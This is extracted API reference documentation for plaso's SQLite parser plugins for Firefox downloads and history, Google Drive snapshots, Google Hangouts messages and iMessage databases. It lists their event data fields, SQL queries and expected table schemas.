plaso.parsers.sqlite_plugins.firefox_downloads module

SQLite parser plugin for Mozilla Firefox downloads database files.

class plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadEventDataBases: plaso.containers.events.EventData

Firefox download event data.

full_pathfull path of the target of the download.

Type str

mime_typemime type of the download.

Type str

namename of the download.

Type str

received_bytesnumber of bytes received.

Type int

referrerreferrer URL of the download.

Type str

temporary_locationtemporary location of the download.

Type str

total_bytestotal number of bytes of the download.

Type int

urlsource URL of the download.

Type str

DATA_TYPE = 'firefox:downloads:download'

class plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadsPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Mozilla Firefox downloads database files.

The Mozilla Firefox downloads database file is typically stored in: downloads.sqlite



DATA_FORMAT = 'Mozilla Firefox downloads SQLite database (downloads.sqlite) file'

NAME = 'firefox_downloads'

ParseDownloadsRow(parser_mediator, query, row, **unused_kwargs)Parses a downloads row.

Parameters




QUERIES = [('SELECT moz_downloads.id, moz_downloads.name, moz_downloads.source, moz_downloads.target, moz_downloads.tempPath, moz_downloads.startTime, moz_downloads.endTime, moz_downloads.state, moz_downloads.referrer, moz_downloads.currBytes, moz_downloads.maxBytes, moz_downloads.mimeType FROM moz_downloads', 'ParseDownloadsRow')]

REQUIRED_STRUCTURE = {'moz_downloads': frozenset({'currBytes', 'endTime', 'id', 'maxBytes', 'mimeType', 'name', 'referrer', 'source', 'startTime', 'state', 'target', 'tempPath'})}

SCHEMAS = [{'moz_downloads': 'CREATE TABLE moz_downloads (id INTEGER PRIMARY KEY, name TEXT, source TEXT, target TEXT, tempPath TEXT, startTime INTEGER, endTime INTEGER, state INTEGER, referrer TEXT, entityID TEXT, currBytes INTEGER NOT NULL DEFAULT 0, maxBytes INTEGER NOT NULL DEFAULT -1, mimeType TEXT, preferredApplication TEXT, preferredAction INTEGER NOT NULL DEFAULT 0, autoResume INTEGER NOT NULL DEFAULT 0)'}]

plaso.parsers.sqlite_plugins.firefox_history module

SQLite parser plugin for Mozilla Firefox history database files.

class plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Mozilla Firefox history database files.

The Mozilla Firefox history database file is typically stored in: places.sqlite

DATA_FORMAT = 'Mozilla Firefox history SQLite database (places.sqlite) file'

NAME = 'firefox_history'

ParseBookmarkAnnotationRow(parser_mediator, query, row, **unused_kwargs)Parses a bookmark annotation row.

Parameters




ParseBookmarkFolderRow(parser_mediator, query, row, **unused_kwargs)Parses a bookmark folder row.

Parameters




ParseBookmarkRow(parser_mediator, query, row, **unused_kwargs)Parses a bookmark row.

Parameters






ParsePageVisitedRow(parser_mediator, query, row, cache=None, database=None, **un-used_kwargs)

Parses a page visited row.

Parameters




• cache (Optional[SQLiteCache]) – cache.


QUERIES = [('SELECT moz_historyvisits.id, moz_places.url, moz_places.title, moz_places.visit_count, moz_historyvisits.visit_date, moz_historyvisits.from_visit, moz_places.rev_host, moz_places.hidden, moz_places.typed, moz_historyvisits.visit_type FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id', 'ParsePageVisitedRow'), ('SELECT moz_bookmarks.type, moz_bookmarks.title AS bookmark_title, moz_bookmarks.dateAdded, moz_bookmarks.lastModified, moz_places.url, moz_places.title AS places_title, moz_places.rev_host, moz_places.visit_count, moz_bookmarks.id FROM moz_places, moz_bookmarks WHERE moz_bookmarks.fk = moz_places.id AND moz_bookmarks.type <> 3', 'ParseBookmarkRow'), ('SELECT moz_items_annos.content, moz_items_annos.dateAdded, moz_items_annos.lastModified, moz_bookmarks.title, moz_places.url, moz_places.rev_host, moz_items_annos.id FROM moz_items_annos, moz_bookmarks, moz_places WHERE moz_items_annos.item_id = moz_bookmarks.id AND moz_bookmarks.fk = moz_places.id', 'ParseBookmarkAnnotationRow'), ('SELECT moz_bookmarks.id, moz_bookmarks.title,moz_bookmarks.dateAdded, moz_bookmarks.lastModified FROM moz_bookmarks WHERE moz_bookmarks.type = 2', 'ParseBookmarkFolderRow')]

REQUIRED_STRUCTURE = {'moz_bookmarks': frozenset({'dateAdded', 'fk', 'id', 'lastModified', 'title', 'type'}), 'moz_historyvisits': frozenset({'from_visit', 'id', 'place_id', 'visit_date', 'visit_type'}), 'moz_items_annos': frozenset({'content', 'dateAdded', 'id', 'item_id', 'lastModified'}), 'moz_places': frozenset({'hidden', 'id', 'rev_host', 'title', 'typed', 'url', 'visit_count'})}

SCHEMAS = [{'moz_anno_attributes': 'CREATE TABLE moz_anno_attributes ( id INTEGER PRIMARY KEY, name VARCHAR(32) UNIQUE NOT NULL)', 'moz_annos': 'CREATE TABLE moz_annos ( id INTEGER PRIMARY KEY, place_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_bookmarks': 'CREATE TABLE moz_bookmarks ( id INTEGER PRIMARY KEY, type INTEGER, fk INTEGER DEFAULT NULL, parent INTEGER, position INTEGER, title LONGVARCHAR, keyword_id INTEGER, folder_type TEXT, dateAdded INTEGER, lastModified INTEGER)', 'moz_bookmarks_roots': 'CREATE TABLE moz_bookmarks_roots ( root_name VARCHAR(16) UNIQUE, folder_id INTEGER)', 'moz_favicons': 'CREATE TABLE moz_favicons ( id INTEGER PRIMARY KEY, url LONGVARCHAR UNIQUE, data BLOB, mime_type VARCHAR(32), expiration LONG)', 'moz_historyvisits': 'CREATE TABLE moz_historyvisits ( id INTEGER PRIMARY KEY, from_visit INTEGER, place_id INTEGER, visit_date INTEGER, visit_type INTEGER, session INTEGER)', 'moz_inputhistory': 'CREATE TABLE moz_inputhistory ( place_id INTEGER NOT NULL, input LONGVARCHAR NOT NULL, use_count INTEGER, PRIMARY KEY (place_id, input))', 'moz_items_annos': 'CREATE TABLE moz_items_annos ( id INTEGER PRIMARY KEY, item_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_keywords': 'CREATE TABLE moz_keywords ( id INTEGER PRIMARY KEY AUTOINCREMENT, keyword TEXT UNIQUE)', 'moz_places': 'CREATE TABLE moz_places ( id INTEGER PRIMARY KEY, url LONGVARCHAR, title LONGVARCHAR, rev_host LONGVARCHAR, visit_count INTEGER DEFAULT 0, hidden INTEGER DEFAULT 0 NOT NULL, typed INTEGER DEFAULT 0 NOT NULL, favicon_id INTEGER, frecency INTEGER DEFAULT -1 NOT NULL, last_visit_date INTEGER )'}, {'moz_anno_attributes': 'CREATE TABLE moz_anno_attributes ( id INTEGER PRIMARY KEY, name VARCHAR(32) UNIQUE NOT NULL)', 'moz_annos': 'CREATE TABLE moz_annos ( id INTEGER PRIMARY KEY, place_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_bookmarks': 'CREATE TABLE moz_bookmarks ( id INTEGER PRIMARY KEY, type INTEGER, fk INTEGER DEFAULT NULL, parent INTEGER, position INTEGER, title LONGVARCHAR, keyword_id INTEGER, folder_type TEXT, dateAdded INTEGER, lastModified INTEGER, guid TEXT)', 'moz_bookmarks_roots': 'CREATE TABLE moz_bookmarks_roots ( root_name VARCHAR(16) UNIQUE, folder_id INTEGER)', 'moz_favicons': 'CREATE TABLE moz_favicons ( id INTEGER PRIMARY KEY, url LONGVARCHAR UNIQUE, data BLOB, mime_type VARCHAR(32), expiration LONG, guid TEXT)', 'moz_historyvisits': 'CREATE TABLE moz_historyvisits ( id INTEGER PRIMARY KEY, from_visit INTEGER, place_id INTEGER, visit_date INTEGER, visit_type INTEGER, session INTEGER)', 'moz_hosts': 'CREATE TABLE moz_hosts ( id INTEGER PRIMARY KEY, host TEXT NOT NULL UNIQUE, frecency INTEGER, typed INTEGER NOT NULL DEFAULT 0, prefix TEXT)', 'moz_inputhistory': 'CREATE TABLE moz_inputhistory ( place_id INTEGER NOT NULL, input LONGVARCHAR NOT NULL, use_count INTEGER, PRIMARY KEY (place_id, input))', 'moz_items_annos': 'CREATE TABLE moz_items_annos ( id INTEGER PRIMARY KEY, item_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_keywords': 'CREATE TABLE moz_keywords ( id INTEGER PRIMARY KEY AUTOINCREMENT, keyword TEXT UNIQUE)', 'moz_places': 'CREATE TABLE moz_places ( id INTEGER PRIMARY KEY, url LONGVARCHAR, title LONGVARCHAR, rev_host LONGVARCHAR, visit_count INTEGER DEFAULT 0, hidden INTEGER DEFAULT 0 NOT NULL, typed INTEGER DEFAULT 0 NOT NULL, favicon_id INTEGER, frecency INTEGER DEFAULT -1 NOT NULL, last_visit_date INTEGER , guid TEXT)', 'sqlite_stat1': 'CREATE TABLE sqlite_stat1(tbl, idx, stat)'}]

URL_CACHE_QUERY = 'SELECT h.id AS id, p.url, p.rev_host FROM moz_places p, moz_historyvisits h WHERE p.id = h.place_id'

class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkAnnotationEventDataBases: plaso.containers.events.EventData

Firefox bookmark annotation event data.

contentannotation content.

Type str

titletitle of the bookmark folder.

Type str

urlbookmarked URL.

Type str

DATA_TYPE = 'firefox:places:bookmark_annotation'

class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkEventDataBases: plaso.containers.events.EventData

Firefox bookmark event data.

hostvisited hostname.

Type str

places_titleplaces title.

Type str




Type str

typebookmark type.

Type int

urlbookmarked URL.

Type str

visit_countvisit count.

Type int

DATA_TYPE = 'firefox:places:bookmark'

class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkFolderEventDataBases: plaso.containers.events.EventData

Firefox bookmark folder event data.


Type str

DATA_TYPE = 'firefox:places:bookmark_folder'

class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesPageVisitedEventDataBases: plaso.containers.events.EventData

Firefox page visited event data.

extraextra event data.

Type list[object]

hostvisited hostname.

Type str

titletitle of the visited page.

Type str

urlURL of the visited page.

Type str

visit_countvisit count.

Type int

visit_typetransition type for the event.



Type str

DATA_TYPE = 'firefox:places:page_visited'

plaso.parsers.sqlite_plugins.gdrive module

SQLite parser plugin for Google Drive snapshot database files.

class plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Google Drive snapshot database files.

The Google Drive snapshot database file is typically stored in: snapshot.db

CLOUD_PATH_CACHE_QUERY = 'SELECT cloud_entry.filename, cloud_entry.resource_id, cloud_relations.parent_resource_id AS parent FROM cloud_entry, cloud_relations WHERE cloud_entry.doc_type = 0 AND cloud_entry.resource_id = cloud_relations.child_resource_id'

DATA_FORMAT = 'Google Drive snapshot SQLite database (snapshot.db) file'

GetCloudPath(resource_id, cache, database)Return cloud path given a resource id.

Parameters

• resource_id (str) – resource identifier for the file.

• cache (SQLiteCache) – cache.

• database (SQLiteDatabase) – database.

Returns full path to the resource value.

Return type str

GetLocalPath(inode, cache, database)Return local path for a given inode.

Parameters

• inode (int) – inode number for the file.



Returns full path, including the filename of the given inode value.

Return type str

LOCAL_PATH_CACHE_QUERY = 'SELECT local_relations.child_inode_number, local_relations.parent_inode_number, local_entry.filename FROM local_relations, local_entry WHERE local_relations.child_inode_number = local_entry.inode_number'

NAME = 'google_drive'

ParseCloudEntryRow(parser_mediator, query, row, cache=None, database=None, **un-used_kwargs)

Parses a cloud entry row.

Parameters








ParseLocalEntryRow(parser_mediator, query, row, cache=None, database=None, **un-used_kwargs)

Parses a local entry row.

Parameters






QUERIES = [('SELECT cloud_entry.resource_id, cloud_entry.filename, cloud_entry.modified, cloud_entry.created, cloud_entry.size, cloud_entry.doc_type, cloud_entry.shared, cloud_entry.checksum, cloud_entry.url, cloud_relations.parent_resource_id FROM cloud_entry, cloud_relations WHERE cloud_relations.child_resource_id = cloud_entry.resource_id AND cloud_entry.modified IS NOT NULL;', 'ParseCloudEntryRow'), ('SELECT inode_number, filename, modified, checksum, size FROM local_entry WHERE modified IS NOT NULL;', 'ParseLocalEntryRow')]

REQUIRED_STRUCTURE = {'cloud_entry': frozenset({'checksum', 'created', 'doc_type', 'filename', 'modified', 'resource_id', 'shared', 'size', 'url'}), 'cloud_relations': frozenset({'child_resource_id', 'parent', 'parent_resource_id'}), 'local_entry': frozenset({'checksum', 'filename', 'inode_number', 'modified', 'size'}), 'local_relations': frozenset({'child_inode_number', 'parent_inode_number'})}

SCHEMAS = [{'cloud_entry': 'CREATE TABLE cloud_entry (resource_id TEXT, filename TEXT, modified INTEGER, created INTEGER, acl_role INTEGER, doc_type INTEGER, removed INTEGER, url TEXT, size INTEGER, checksum TEXT, shared INTEGER, PRIMARY KEY (resource_id))', 'cloud_relations': 'CREATE TABLE cloud_relations (child_resource_id TEXT, parent_resource_id TEXT, UNIQUE (child_resource_id, parent_resource_id), FOREIGN KEY (child_resource_id) REFERENCES cloud_entry(resource_id), FOREIGN KEY (parent_resource_id) REFERENCES cloud_entry(resource_id))', 'local_entry': 'CREATE TABLE local_entry (inode_number INTEGER, filename TEXT, modified INTEGER, checksum TEXT, size INTEGER, PRIMARY KEY (inode_number))', 'local_relations': 'CREATE TABLE local_relations (child_inode_number INTEGER, parent_inode_number INTEGER, UNIQUE (child_inode_number), FOREIGN KEY (parent_inode_number) REFERENCES local_entry(inode_number), FOREIGN KEY (child_inode_number) REFERENCES local_entry(inode_number))', 'mapping': 'CREATE TABLE mapping (inode_number INTEGER, resource_id TEXT, UNIQUE (inode_number), FOREIGN KEY (inode_number) REFERENCES local_entry(inode_number), FOREIGN KEY (resource_id) REFERENCES cloud_entry(resource_id))', 'overlay_status': 'CREATE TABLE overlay_status (path TEXT, overlay_status INTEGER, PRIMARY KEY (path))'}]

class plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotCloudEntryEventDataBases: plaso.containers.events.EventData

Google Drive snapshot cloud entry event data.

doc_typedocument type.

Type int

pathpath of the file.

Type str

sharedTrue if the file is shared, False if the file is private.

Type bool

sizesize of the file.

Type int

urlURL of the file.

Type str

DATA_TYPE = 'gdrive:snapshot:cloud_entry'

class plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotLocalEntryEventDataBases: plaso.containers.events.EventData

Google Drive snapshot local entry event data.

pathpath of the file.

Type str



sizesize of the file.

Type int

DATA_TYPE = 'gdrive:snapshot:local_entry'

plaso.parsers.sqlite_plugins.hangouts_messages module

SQLite parser plugin for Google Hangouts conversations database files.

class plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageDataBases: plaso.containers.events.EventData

GoogleHangouts Message event data.

bodycontent of the SMS text message.

Type str

message_statusmessage status.

Type int

message_typemessage type.

Type int

senderName with the sender.

Type str

DATA_TYPE = 'android:messaging:hangouts'

class plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessagePluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Google Hangouts conversations database files.

The Google Hangouts conversations database file is typically stored in:/data/com.google.android.talk/databases/babel.db

This SQLite database is the conversation database for conversations, participant names, messages, and informa-tion about the Google Hangout event. There can be multiple babel.db databases, and each database name willbe followed by an integer starting with 0, for example: “babel0.db,babel1.db,babel3.db”.

DATA_FORMAT = 'Google Hangouts conversations SQLite database (babel.db) file'

NAME = 'hangouts_messages'

ParseMessagesRow(parser_mediator, query, row, **unused_kwargs)Parses an Messages row.

Parameters






QUERIES = [('SELECT messages._id, participants.full_name, text, messages.timestamp,status, type FROM messages INNER JOIN participants ON messages.author_chat_id=participants.chat_id;', 'ParseMessagesRow')]

REQUIRED_STRUCTURE = {'blocked_people': frozenset({}), 'messages': frozenset({'_id', 'author_chat_id', 'status', 'text', 'timestamp', 'type'}), 'participants': frozenset({'chat_id', 'full_name'})}

SCHEMAS = [{'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'blocked_people': 'CREATE TABLE blocked_people (_id INTEGER PRIMARY KEY, gaia_id TEXT, chat_id TEXT, name TEXT, profile_photo_url TEXT, UNIQUE (chat_id) ON CONFLICT REPLACE, UNIQUE (gaia_id) ON CONFLICT REPLACE)', 'conversation_participants': 'CREATE TABLE conversation_participants (_id INTEGER PRIMARY KEY, participant_row_id INT, participant_type INT, conversation_id TEXT, sequence INT, active INT, invitation_status INT DEFAULT(0), UNIQUE (conversation_id,participant_row_id) ON CONFLICT REPLACE, FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE, FOREIGN KEY (participant_row_id) REFERENCES participants(_id))', 'conversations': 'CREATE TABLE conversations (_id INTEGER PRIMARY KEY, conversation_id TEXT, conversation_type INT, latest_message_timestamp INT DEFAULT(0), latest_message_expiration_timestamp INT, metadata_present INT,notification_level INT, name TEXT, generated_name TEXT, snippet_type INT, snippet_text TEXT, snippet_image_url TEXT, snippet_author_gaia_id TEXT, snippet_author_chat_id TEXT, snippet_message_row_id INT, snippet_selector INT, snippet_status INT, snippet_new_conversation_name TEXT, snippet_participant_keys TEXT, snippet_sms_type TEXT, previous_latest_timestamp INT, status INT, view INT, inviter_gaia_id TEXT, inviter_chat_id TEXT, inviter_affinity INT, is_pending_leave INT, account_id INT, is_otr INT, packed_avatar_urls TEXT, self_avatar_url TEXT, self_watermark INT DEFAULT(0), chat_watermark INT DEFAULT(0), hangout_watermark INT DEFAULT(0), is_draft INT, sequence_number INT, call_media_type INT DEFAULT(0), has_joined_hangout INT, has_chat_notifications DEFAULT(0),has_video_notifications DEFAULT(0),last_hangout_event_time INT, draft TEXT, otr_status INT, otr_toggle INT, last_otr_modification_time INT, continuation_token BLOB, continuation_event_timestamp INT, has_oldest_message INT DEFAULT(0), sort_timestamp INT, first_peak_scroll_time INT, first_peak_scroll_to_message_timestamp INT, second_peak_scroll_time INT, second_peak_scroll_to_message_timestamp INT, conversation_hash BLOB, disposition INT DEFAULT(0), has_persistent_events INT DEFAULT(-1), transport_type INT DEFAULT(1), default_transport_phone TEXT, sms_service_center TEXT, is_temporary INT DEFAULT (0), sms_thread_id INT DEFAULT (-1), chat_ringtone_uri TEXT, hangout_ringtone_uri TEXT, snippet_voicemail_duration INT DEFAULT (0), share_count INT DEFAULT(0), has_unobserved TEXT, last_share_timestamp INT DEFAULT(0), gls_status INT DEFAULT(0), gls_link TEXT, is_guest INT DEFAULT(0), UNIQUE (conversation_id ))', 'dismissed_contacts': 'CREATE TABLE dismissed_contacts (_id INTEGER PRIMARY KEY, gaia_id TEXT, chat_id TEXT, name TEXT, profile_photo_url TEXT, UNIQUE (chat_id) ON CONFLICT REPLACE, UNIQUE (gaia_id) ON CONFLICT REPLACE)', 'event_suggestions': 'CREATE TABLE event_suggestions (_id INTEGER PRIMARY KEY, conversation_id TEXT, event_id TEXT, suggestion_id TEXT, timestamp INT, expiration_time_usec INT, type INT, gem_asset_url STRING, gem_horizontal_alignment INT, matched_message_substring TEXT, FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE, UNIQUE (conversation_id,suggestion_id) ON CONFLICT REPLACE)', 'merge_keys': 'CREATE TABLE merge_keys (_id INTEGER PRIMARY KEY, conversation_id TEXT, merge_key TEXT, UNIQUE (conversation_id) ON CONFLICT REPLACE, FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE )', 'merged_contact_details': 'CREATE TABLE merged_contact_details (_id INTEGER PRIMARY KEY, merged_contact_id INT, lookup_data_type INT, lookup_data TEXT, lookup_data_standardized TEXT, lookup_data_search TEXT, lookup_data_label TEXT, needs_gaia_ids_resolved INT DEFAULT (1), is_hangouts_user INT DEFAULT (0), gaia_id TEXT, avatar_url TEXT, display_name TEXT, last_checked_ts INT DEFAULT (0), lookup_data_display TEXT, detail_affinity_score REAL DEFAULT (0.0), detail_logging_id TEXT, is_in_viewer_dasher_domain INT DEFAULT (0), FOREIGN KEY (merged_contact_id) REFERENCES merged_contacts(_id) ON DELETE CASCADE ON UPDATE CASCADE)', 'merged_contacts': 'CREATE TABLE merged_contacts (_id INTEGER PRIMARY KEY, contact_lookup_key TEXT, contact_id INT, raw_contact_id INT, display_name TEXT, avatar_url TEXT, is_frequent INT DEFAULT (0), is_favorite INT DEFAULT (0), contact_source INT DEFAULT(0), frequent_order INT, person_logging_id TEXT, person_affinity_score REAL DEFAULT (0.0), is_in_same_domain INT DEFAULT (0))', 'messages': 'CREATE TABLE messages (_id INTEGER PRIMARY KEY, message_id TEXT, message_type INT, conversation_id TEXT, author_chat_id TEXT, author_gaia_id TEXT, text TEXT, timestamp INT, delete_after_read_timetamp INT, status INT, type INT, local_url TEXT, remote_url TEXT, attachment_content_type TEXT, width_pixels INT, height_pixels INT, stream_id TEXT, image_id TEXT, album_id TEXT, latitude DOUBLE, longitude DOUBLE, address ADDRESS, notification_level INT, expiration_timestamp INT, notified_for_failure INT DEFAULT(0), off_the_record INT DEFAULT(0), transport_type INT NOT NULL DEFAULT(1), transport_phone TEXT, external_ids TEXT, sms_timestamp_sent INT DEFAULT(0), sms_priority INT DEFAULT(0), sms_message_size INT DEFAULT(0), mms_subject TEXT, sms_raw_sender TEXT, sms_raw_recipients TEXT, persisted INT DEFAULT(1), sms_message_status INT DEFAULT(-1), sms_type INT DEFAULT(-1), stream_url TEXT, attachment_target_url TEXT, attachment_name TEXT, image_rotation INT DEFAULT (0), new_conversation_name TEXT, participant_keys TEXT, forwarded_mms_url TEXT, forwarded_mms_count INT DEFAULT(0), attachment_description TEXT, attachment_target_url_description TEXT, attachment_target_url_name TEXT, attachment_blob_data BLOB,attachment_uploading_progress INT DEFAULT(0), sending_error INT DEFAULT(0), stream_expiration INT, voicemail_length INT DEFAULT (0), call_media_type INT DEFAULT(0), last_seen_timestamp INT DEFAULT(0), observed_status INT DEFAULT(2), receive_type INT DEFAULT(0), init_timestamp INT DEFAULT(0), in_app_msg_latency INT DEFAULT(0), notified INT DEFAULT(0), alert_in_conversation_list INT DEFAULT(0), attachments BLOB, is_user_mentioned INT DEFAULT(0), local_id TEXT, request_task_row_id INT DEFAULT(-1), FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE, UNIQUE (conversation_id,message_id) ON CONFLICT REPLACE)', 'mms_notification_inds': 'CREATE TABLE mms_notification_inds (_id INTEGER PRIMARY KEY, content_location TEXT, transaction_id TEXT, from_address TEXT, message_size INT DEFAULT(0), expiry INT)', 'multipart_attachments': 'CREATE TABLE multipart_attachments (_id INTEGER PRIMARY KEY, message_id TEXT, conversation_id TEXT, url TEXT, content_type TEXT, width INT, height INT, FOREIGN KEY (message_id, conversation_id) REFERENCES messages(message_id, conversation_id) ON DELETE CASCADE ON UPDATE CASCADE)', 'participant_email_fts': 'CREATE VIRTUAL TABLE participant_email_fts USING fts4(content="merged_contact_details", gaia_id,lookup_data)', 'participant_email_fts_docsize': "CREATE TABLE 'participant_email_fts_docsize'(docid INTEGER PRIMARY KEY, size BLOB)", 'participant_email_fts_segdir': "CREATE TABLE 'participant_email_fts_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx))", 'participant_email_fts_segments': "CREATE TABLE 'participant_email_fts_segments'(blockid INTEGER PRIMARY KEY, block BLOB)", 'participant_email_fts_stat': "CREATE TABLE 'participant_email_fts_stat'(id INTEGER PRIMARY KEY, value BLOB)", 'participants': "CREATE TABLE participants (_id INTEGER PRIMARY KEY, participant_type INT DEFAULT 1, gaia_id TEXT, chat_id TEXT, phone_id TEXT, circle_id TEXT, first_name TEXT, full_name TEXT, fallback_name TEXT, profile_photo_url TEXT, batch_gebi_tag STRING DEFAULT('-1'), blocked INT DEFAULT(0), in_users_domain BOOLEAN, UNIQUE (circle_id) ON CONFLICT REPLACE, UNIQUE (chat_id) ON CONFLICT REPLACE, UNIQUE (gaia_id) ON CONFLICT REPLACE)", 'participants_fts': 'CREATE VIRTUAL TABLE participants_fts USING fts4(content="participants",gaia_id,full_name)', 'participants_fts_docsize': "CREATE TABLE 'participants_fts_docsize'(docid INTEGER PRIMARY KEY, size BLOB)", 'participants_fts_segdir': "CREATE TABLE 'participants_fts_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx))", 'participants_fts_segments': "CREATE TABLE 'participants_fts_segments'(blockid INTEGER PRIMARY KEY, block BLOB)", 'participants_fts_stat': "CREATE TABLE 'participants_fts_stat'(id INTEGER PRIMARY KEY, value BLOB)", 'presence': 'CREATE TABLE presence (_id INTEGER PRIMARY KEY, gaia_id TEXT NOT NULL, reachable INT DEFAULT(0), reachable_time INT DEFAULT(0), available INT DEFAULT(0), available_time INT DEFAULT(0), status_message TEXT, status_message_time INT DEFAULT(0), call_type INT DEFAULT(0), call_type_time INT DEFAULT(0), device_status INT DEFAULT(0), device_status_time INT DEFAULT(0), last_seen INT DEFAULT(0), last_seen_time INT DEFAULT(0), location BLOB, location_time INT DEFAULT(0), UNIQUE (gaia_id) ON CONFLICT REPLACE)', 'recent_calls': 'CREATE TABLE recent_calls (_id INTEGER PRIMARY KEY, normalized_number TEXT NOT NULL, phone_number TEXT, contact_id TEXT, call_timestamp INT, call_type INT, contact_type INT, call_rate TEXT, is_free_call BOOLEAN)', 'search': 'CREATE TABLE search (search_key TEXT NOT NULL,continuation_token TEXT,PRIMARY KEY (search_key))', 'sticker_albums': 'CREATE TABLE sticker_albums (album_id TEXT NOT NULL, title TEXT, cover_photo_id TEXT, last_used INT DEFAULT(0), PRIMARY KEY (album_id))', 'sticker_photos': 'CREATE TABLE sticker_photos (photo_id TEXT NOT NULL, album_id TEXT NOT NULL, url TEXT NOT NULL, file_name TEXT, last_used INT DEFAULT(0), PRIMARY KEY (photo_id), FOREIGN KEY (album_id) REFERENCES sticker_albums(album_id) ON DELETE CASCADE)', 'suggested_contacts': 'CREATE TABLE suggested_contacts (_id INTEGER PRIMARY KEY, gaia_id TEXT, chat_id TEXT, name TEXT, first_name TEXT, packed_circle_ids TEXT, profile_photo_url TEXT, sequence INT, suggestion_type INT, logging_id TEXT, affinity_score REAL DEFAULT (0.0), is_in_same_domain INT DEFAULT (0))'}]

plaso.parsers.sqlite_plugins.imessage module

SQLite parser plugin for MacOS and iOS iMessage database files.

class plaso.parsers.sqlite_plugins.imessage.IMessageEventDataBases: plaso.containers.events.EventData

iMessage and SMS event data.

attachment_locationlocation of the attachment.

Type str

imessage_idmobile number or email address the message was sent to or received from.

Type str

message_typevalue to indicate the message was sent (1) or received (0).

Type int

read_receiptTrue if the message read receipt was received.

Type bool

serviceservice, which is either SMS or iMessage.

Type str

textcontent of the message.

Type str

DATA_TYPE = 'imessage:event:chat'

class plaso.parsers.sqlite_plugins.imessage.IMessagePluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS and iOS iMessage database files.

The iMessage database file is typically stored in: chat.db sms.db

DATA_FORMAT = 'MacOS and iOS iMessage database (chat.db, sms.db) file'

NAME = 'imessage'

ParseMessageRow(parser_mediator, query, row, **unused_kwargs)Parses a message row.

Parameters






QUERIES = [('SELECT m.date, m.ROWID, h.id AS imessage_id, m.is_read AS read_receipt, m.is_from_me AS message_type, m.service, a.filename AS"attachment_location", m.text FROM message AS m JOIN handle AS h ON h.ROWID = m.handle_id LEFT OUTER JOIN message_attachment_join AS maj ON m.ROWID = maj.message_id LEFT OUTER JOIN attachment AS a ON maj.attachment_id = a.ROWID', 'ParseMessageRow')]

REQUIRED_STRUCTURE = {'attachment': frozenset({'ROWID', 'filename'}), 'handle': frozenset({'ROWID', 'id'}), 'message': frozenset({'ROWID', 'date', 'handle_id', 'is_from_me', 'is_read', 'service', 'text'}), 'message_attachment_join': frozenset({'attachment_id', 'message_id'})}

